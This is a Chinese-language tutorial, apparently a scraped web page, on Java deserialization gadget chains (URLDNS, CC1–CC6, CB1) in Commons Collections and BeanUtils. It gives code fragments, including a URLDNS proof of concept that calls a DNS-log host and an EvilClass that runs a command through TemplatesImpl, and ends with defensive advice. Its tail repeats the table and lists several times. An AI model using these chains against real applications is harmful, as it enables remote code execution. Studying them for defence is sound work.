CC\/CB链整合分析教程<\/h1>

1. URLDNS链分析<\/h2>

1.1 基本原理<\/h3>

URLDNS链用于探测反序列化漏洞是否存在<\/li>
通过HashMap的hash方法触发URL的hashCode方法<\/li>

hashCode方法会发起DNS查询<\/li> <\/ul>

1.2 关键代码<\/h3>

\/\/ 触发点
<\/span><\/span><\/span><\/span>handler.<\/span>hashCode<\/span>(<\/span>this<\/span>);<\/span>  \/\/ 在URL类中
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 完整POC
<\/span><\/span><\/span><\/span>HashMap hm =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>URL u =<\/span> new<\/span> URL(<\/span>"http:\/\/dnslog.cn"<\/span>);<\/span>
<\/span><\/span>\/\/ 反射修改hashCode值避免put时触发
<\/span><\/span><\/span><\/span>Field f =<\/span> u.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span>
<\/span><\/span>f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>f.<\/span>set<\/span>(<\/span>u,<\/span> -<\/span>1<\/span>);<\/span>
<\/span><\/span>hm.<\/span>put<\/span>(<\/span>u,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>\/\/ 恢复hashCode值
<\/span><\/span><\/span><\/span>f.<\/span>set<\/span>(<\/span>u,<\/span> -<\/span>1<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>1.3 利用链<\/h3>
HashMap.readObject() -> HashMap.hash() -> URL.hashCode() -> URLStreamHandler.hashCode() -> URL.getHostAddress() -> DNS查询
<\/code><\/pre>
2. CC1链分析<\/h2>
2.1 环境要求<\/h3>

Commons Collections <= 3.2.1<\/li>
JDK <= 8u65<\/li>
<\/ul>
2.2 核心组件<\/h3>
2.2.1 Transformer接口<\/h4>
public<\/span> interface<\/span> Transformer<\/span> {<\/span>
<\/span><\/span>    Object transform<\/span>(<\/span>Object input);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.2 InvokerTransformer<\/h4>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>    Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>    return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.3 ConstantTransformer<\/h4>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    return<\/span> iConstant;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.4 ChainedTransformer<\/h4>
public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span>
<\/span><\/span>    for<\/span> (<\/span>Transformer transformer :<\/span> iTransformers)<\/span> {<\/span>
<\/span><\/span>        object =<\/span> transformer.<\/span>transform<\/span>(<\/span>object);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> object;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.5 TransformedMap<\/h4>
protected<\/span> Object checkSetValue<\/span>(<\/span>Object value)<\/span> {<\/span>
<\/span><\/span>    return<\/span> valueTransformer.<\/span>transform<\/span>(<\/span>value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.6 AnnotationInvocationHandler<\/h4>
private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream var1)<\/span> {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> memberValue :<\/span> memberValues.<\/span>entrySet<\/span>())<\/span> {<\/span>
<\/span><\/span>        memberValue.<\/span>setValue<\/span>(...);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 完整利用链<\/h3>
AnnotationInvocationHandler.readObject() 
-> AbstractInputCheckedMapDecorator.MapEntry.setValue() 
-> TransformedMap.checkSetValue() 
-> ChainedTransformer.transform() 
-> ConstantTransformer.transform() 
-> InvokerTransformer.transform() 
-> Runtime.exec()
<\/code><\/pre>
2.4 关键点说明<\/h3>


必须使用Target.class<\/code>作为AnnotationInvocationHandler构造参数，因为：<\/p>

必须是注解类<\/li>
注解接口数必须为1<\/li>
必须为Annotation.class<\/li>
<\/ul>
<\/li>

Map中必须包含键为"value"的条目，因为：<\/p>

@Target注解只有value属性<\/li>
代码会检查memberValues中是否有对应注解属性的键<\/li>
<\/ul>
<\/li>
<\/ol>
3. CC6链分析<\/h2>
3.1 改进点<\/h3>

解决高版本JDK中AnnotationInvocationHandler.readObject()不再调用setValue的问题<\/li>
使用LazyMap替代TransformedMap<\/li>
<\/ul>
3.2 核心组件<\/h3>
3.2.1 LazyMap<\/h4>
public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (!<\/span>super<\/span>.<\/span>map<\/span>.<\/span>containsKey<\/span>(<\/span>key))<\/span> {<\/span>
<\/span><\/span>        Object value =<\/span> factory.<\/span>transform<\/span>(<\/span>key);<\/span>
<\/span><\/span>        super<\/span>.<\/span>map<\/span>.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>        return<\/span> value;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> super<\/span>.<\/span>map<\/span>.<\/span>get<\/span>(<\/span>key);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2.2 TiedMapEntry<\/h4>
public<\/span> Object getValue<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> map.<\/span>get<\/span>(<\/span>key);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> int<\/span> hashCode<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> getValue().<\/span>hashCode<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2.3 HashMap<\/h4>
final<\/span> int<\/span> hash<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>    return<\/span> key.<\/span>hashCode<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 完整利用链<\/h3>
HashMap.readObject() 
-> HashMap.hash() 
-> TiedMapEntry.hashCode() 
-> TiedMapEntry.getValue() 
-> LazyMap.get() 
-> ChainedTransformer.transform() 
-> Runtime.exec()
<\/code><\/pre>
3.4 关键问题解决<\/h3>

问题<\/strong>：put操作会提前触发LazyMap.get()<\/li>
解决方案<\/strong>：通过反射修改TiedMapEntry的map属性，避免提前触发<\/li>
<\/ul>
4. CC3链分析<\/h2>
4.1 改进点<\/h3>

绕过Runtime黑名单限制<\/li>
使用TemplatesImpl加载自定义字节码<\/li>
<\/ul>
4.2 核心组件<\/h3>
4.2.1 TemplatesImpl<\/h4>
public<\/span> synchronized<\/span> void<\/span> defineTransletClasses<\/span>()<\/span> {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    _class[<\/span>i]<\/span> =<\/span> loader.<\/span>defineClass<\/span>(<\/span>_bytecodes[<\/span>i]);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> Translet getTransletInstance<\/span>()<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>_class ==<\/span> null<\/span>)<\/span> defineTransletClasses();<\/span>
<\/span><\/span>    AbstractTranslet translet =<\/span> (<\/span>AbstractTranslet)<\/span> _class[<\/span>_transletIndex].<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    return<\/span> translet;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> synchronized<\/span> Properties getOutputProperties<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> newTransformer().<\/span>getOutputProperties<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.3 恶意类要求<\/h3>
public<\/span> class<\/span> EvilClass<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    public<\/span> EvilClass<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 必须实现这两个方法
<\/span><\/span><\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers)<\/span> {}<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler)<\/span> {}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.4 关键配置<\/h3>
\/\/ 设置_bytecodes
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]<\/span> {<\/span>evilCode});<\/span>
<\/span><\/span>\/\/ 设置_name
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>\/\/ 设置_tfactory
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span><\/code><\/pre>5. CC2链分析<\/h2>
5.1 改进点<\/h3>

绕过InvokerTransformer限制<\/li>
使用InstantiateTransformer触发TrAXFilter构造方法<\/li>
<\/ul>
5.2 核心组件<\/h3>
5.2.1 InstantiateTransformer<\/h4>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    Constructor con =<\/span> ((<\/span>Class)<\/span>input).<\/span>getConstructor<\/span>(<\/span>iParamTypes);<\/span>
<\/span><\/span>    return<\/span> con.<\/span>newInstance<\/span>(<\/span>iArgs);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.2.2 TrAXFilter<\/h4>
public<\/span> TrAXFilter<\/span>(<\/span>Templates templates)<\/span> throws<\/span> TransformerConfigurationException {<\/span>
<\/span><\/span>    templates.<\/span>newTransformer<\/span>();<\/span>  \/\/ 触发点
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.3 完整利用链<\/h3>
PriorityQueue.readObject() 
-> heapify() 
-> siftDown() 
-> siftDownUsingComparator() 
-> TransformingComparator.compare() 
-> InstantiateTransformer.transform() 
-> TrAXFilter构造方法 
-> TemplatesImpl.newTransformer() 
-> getTransletInstance() 
-> defineClass()加载恶意字节码
<\/code><\/pre>
6. CC4链分析<\/h2>
6.1 改进点<\/h3>

适用于Commons Collections 4.0+<\/li>
使用TransformingComparator作为触发点<\/li>
<\/ul>
6.2 核心组件<\/h3>
6.2.1 TransformingComparator<\/h4>
public<\/span> int<\/span> compare<\/span>(<\/span>Object obj1,<\/span> Object obj2)<\/span> {<\/span>
<\/span><\/span>    Object value1 =<\/span> this<\/span>.<\/span>transformer<\/span>.<\/span>transform<\/span>(<\/span>obj1);<\/span>
<\/span><\/span>    Object value2 =<\/span> this<\/span>.<\/span>transformer<\/span>.<\/span>transform<\/span>(<\/span>obj2);<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>decorated<\/span>.<\/span>compare<\/span>(<\/span>value1,<\/span> value2);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6.3 关键配置<\/h3>
\/\/ 必须设置size>=2才能触发heapify
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>queue,<\/span> "size"<\/span>,<\/span> 2<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>7. CB1链分析<\/h2>
7.1 环境要求<\/h3>

Commons BeanUtils <= 1.9.2<\/li>
<\/ul>
7.2 核心组件<\/h3>
7.2.1 PropertyUtils.getProperty<\/h4>
\/\/ 可以调用私有getter方法
<\/span><\/span><\/span><\/span>Object value =<\/span> PropertyUtils.<\/span>getProperty<\/span>(<\/span>bean,<\/span> propertyName);<\/span>
<\/span><\/span><\/code><\/pre>7.2.2 BeanComparator<\/h4>
public<\/span> int<\/span> compare<\/span>(<\/span>Object o1,<\/span> Object o2)<\/span> {<\/span>
<\/span><\/span>    Object value1 =<\/span> PropertyUtils.<\/span>getProperty<\/span>(<\/span>o1,<\/span> property);<\/span>
<\/span><\/span>    Object value2 =<\/span> PropertyUtils.<\/span>getProperty<\/span>(<\/span>o2,<\/span> property);<\/span>
<\/span><\/span>    return<\/span> internalCompare(<\/span>value1,<\/span> value2);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>7.3 完整利用链<\/h3>
PriorityQueue.readObject() 
-> heapify() 
-> siftDown() 
-> siftDownUsingComparator() 
-> BeanComparator.compare() 
-> PropertyUtils.getProperty() 
-> TemplatesImpl.getOutputProperties() 
-> newTransformer() 
-> 加载恶意字节码
<\/code><\/pre>
8. 总结<\/h2>
8.1 各链对比<\/h3>



链名称<\/th>
适用版本<\/th>
核心特点<\/th>
触发方式<\/th>
<\/tr>
<\/thead>


URLDNS<\/td>
通用<\/td>
仅用于探测<\/td>
HashMap触发URL.hashCode<\/td>
<\/tr>

CC1<\/td>
CC<=3.2.1, JDK<=8u65<\/td>
使用AnnotationInvocationHandler<\/td>
setValue触发<\/td>
<\/tr>

CC6<\/td>
CC<=3.2.1<\/td>
使用LazyMap+TiedMapEntry<\/td>
hashCode触发<\/td>
<\/tr>

CC3<\/td>
CC<=3.2.1, JDK<=8u65<\/td>
使用TemplatesImpl加载字节码<\/td>
多种触发方式<\/td>
<\/tr>

CC2<\/td>
CC<=3.2.1<\/td>
绕过InvokerTransformer<\/td>
InstantiateTransformer触发<\/td>
<\/tr>

CC4<\/td>
CC4.0+<\/td>
使用TransformingComparator<\/td>
PriorityQueue触发<\/td>
<\/tr>

CB1<\/td>
BeanUtils<=1.9.2<\/td>
使用BeanComparator<\/td>
getProperty触发<\/td>
<\/tr>
<\/tbody>
<\/table>
8.2 防御建议<\/h3>

升级Commons Collections到最新版本<\/li>
使用JDK高版本(>8u65)<\/li>
实施反序列化白名单<\/li>
使用安全框架如SerialKiller<\/li>
<\/ol>
8.3 学习建议<\/h3>

从简单的URLDNS开始理解基本原理<\/li>
逐步分析每个Transformer的功能<\/li>
重点关注触发点和参数传递<\/li>
使用调试工具跟踪执行流程<\/li>
尝试构造自己的POC加深理解<\/li>
<\/ol>

链名称<\/th>	适用版本<\/th>	核心特点<\/th>	触发方式<\/th> <\/tr> <\/thead>
URLDNS<\/td>	通用<\/td>	仅用于探测<\/td>	HashMap触发URL.hashCode<\/td> <\/tr>
CC1<\/td>	CC<=3.2.1, JDK<=8u65<\/td>	使用AnnotationInvocationHandler<\/td>	setValue触发<\/td> <\/tr>
CC6<\/td>	CC<=3.2.1<\/td>	使用LazyMap+TiedMapEntry<\/td>	hashCode触发<\/td> <\/tr>
CC3<\/td>	CC<=3.2.1, JDK<=8u65<\/td>	使用TemplatesImpl加载字节码<\/td>	多种触发方式<\/td> <\/tr>
CC2<\/td>	CC<=3.2.1<\/td>	绕过InvokerTransformer<\/td>	InstantiateTransformer触发<\/td> <\/tr>
CC4<\/td>	CC4.0+<\/td>	使用TransformingComparator<\/td>	PriorityQueue触发<\/td> <\/tr>
CB1<\/td>	BeanUtils<=1.9.2<\/td>	使用BeanComparator<\/td>	getProperty触发<\/td> <\/tr> <\/tbody> <\/table> 8.2 防御建议<\/h3> 升级Commons Collections到最新版本<\/li> 使用JDK高版本(>8u65)<\/li> 实施反序列化白名单<\/li> 使用安全框架如SerialKiller<\/li> <\/ol> 8.3 学习建议<\/h3> 从简单的URLDNS开始理解基本原理<\/li> 逐步分析每个Transformer的功能<\/li> 重点关注触发点和参数传递<\/li> 使用调试工具跟踪执行流程<\/li> 尝试构造自己的POC加深理解<\/li> <\/ol>

CC\/CB链整合分析教程<\/h1>

1. URLDNS链分析<\/h2>

2. CC1链分析<\/h2>

2.2 核心组件<\/h3>

3. CC6链分析<\/h2>

3.2 核心组件<\/h3>

4. CC3链分析<\/h2>

4.2 核心组件<\/h3>

5. CC2链分析<\/h2>

5.2 核心组件<\/h3>

6. CC4链分析<\/h2>

6.2 核心组件<\/h3>

7. CB1链分析<\/h2>

7.2 核心组件<\/h3>

8. 总结<\/h2>

8.3 学习建议<\/h3> 从简单的URLDNS开始理解基本原理<\/li> 逐步分析每个Transformer的功能<\/li> 重点关注触发点和参数传递<\/li> 使用调试工具跟踪执行流程<\/li> 尝试构造自己的POC加深理解<\/li> <\/ol>

8.3 学习建议<\/h3>

从简单的URLDNS开始理解基本原理<\/li>
逐步分析每个Transformer的功能<\/li>
重点关注触发点和参数传递<\/li>
使用调试工具跟踪执行流程<\/li>
尝试构造自己的POC加深理解<\/li> <\/ol>